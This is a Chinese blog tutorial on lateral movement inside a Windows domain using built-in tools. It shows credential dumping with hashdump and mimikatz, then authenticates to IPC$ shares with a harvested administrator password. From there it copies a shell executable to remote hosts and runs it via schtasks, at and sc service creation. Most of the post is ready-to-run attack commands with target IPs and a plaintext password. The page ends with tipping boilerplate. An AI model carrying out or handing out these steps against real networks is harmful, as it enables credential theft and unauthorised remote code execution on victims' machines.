内网渗透-内置工具横向移动

内置工具横向移动

前言

前期给大家讲了一些横向移动的知识,今天给大家讲解一下横向移动中工具的使用。

IPC

IPC+Schtasks(文件共享服务和定时任务)
利用条件:
开放了139,445端口
必须开启IPC$文件共享服务
需要目标机器的管理员账号和密码

hashdump
load mimikatz

得到账号和密码
kerberos
ssp
wdigest

net view 当前的域有哪些主机
net use 查看当前是否有开放IPC连接
在这里插入图片描述
此时还没有建立ipc连接,我们尝试建立一下ipc连接

在这里已经获取了一个shell,而且通过net view主机存活探测,发现了另一台主机(在同一网段)
在这里插入图片描述
在这里插入图片描述
删除IPC连接
net use \192.168.52.141\ipc$ /del

添加IPC连接
net use \192.168.52.141\ipc$ /user:Administrator “Lza20001103”(其中密码通过mimikatz获取)
在这里插入图片描述
net use 就有了连接

dir \192.168.52.141\c$ 就获取到了远程主机C盘的内容
在这里插入图片描述
进入已经获取得shell,打开C盘查看目录

查看内容
copy a.txt \192.168.231.144\c$(复制到远程主机上)

dir \192.168.231.144\c$(查看C盘内容)

copy \192.168.231.144\c$\b.txt c:\(从远程主机下载文件到当前主机的C盘中)

net time \192.168.231.144 查看目标主机时间

Schtasks

将本机的shell上传到远程主机上
copy C:\Users\Administrator\Desktop\test1.exe \192.168.52.141c$(目标机没有开启并占用)

创建定时任务
schtasks /create /s 192.168.52.141 /u god\Administrator /p “Lza20001103” /sc MINUTE/mo 1 /tn test2 /tr “c:\test.exe”(/s 目标机器,/u用户名,/sc分钟,/mo几分钟,/tn任务名称,/tr执行的任务路径)

在目标主机上删除任务
schtasks /delete /s 192.168.231.144 /tn test2

winver 查看机器的版本

IPC+AT

IPC+AT(win2012不适用)
net time \192.168.52.141
at \192.168.52.141 19.08 c:\test.exe(这里的时间可以根据查看的时间往后一分钟来定)

IPC+SC

sc创建服务执行
sc \192.168.52.141 create test binpath=“c:\test.exe” obj=“god\Administrator” password=Lza20001103
sc \192.168.52.141 start test
sc \192.168.52.141 qc test 查询任务

查看远程主机的服务状态
sc \192.168.231.144 qc test(shell中执行)

后记

本次用来记录内置工具的横向移动,内容比较少,当我们外部工具无法获取其他主机的权限的话,可以采用内置的工具进行横向获取权限。特别是对开启IPC有很好的的效果。

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

炫彩@之星

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值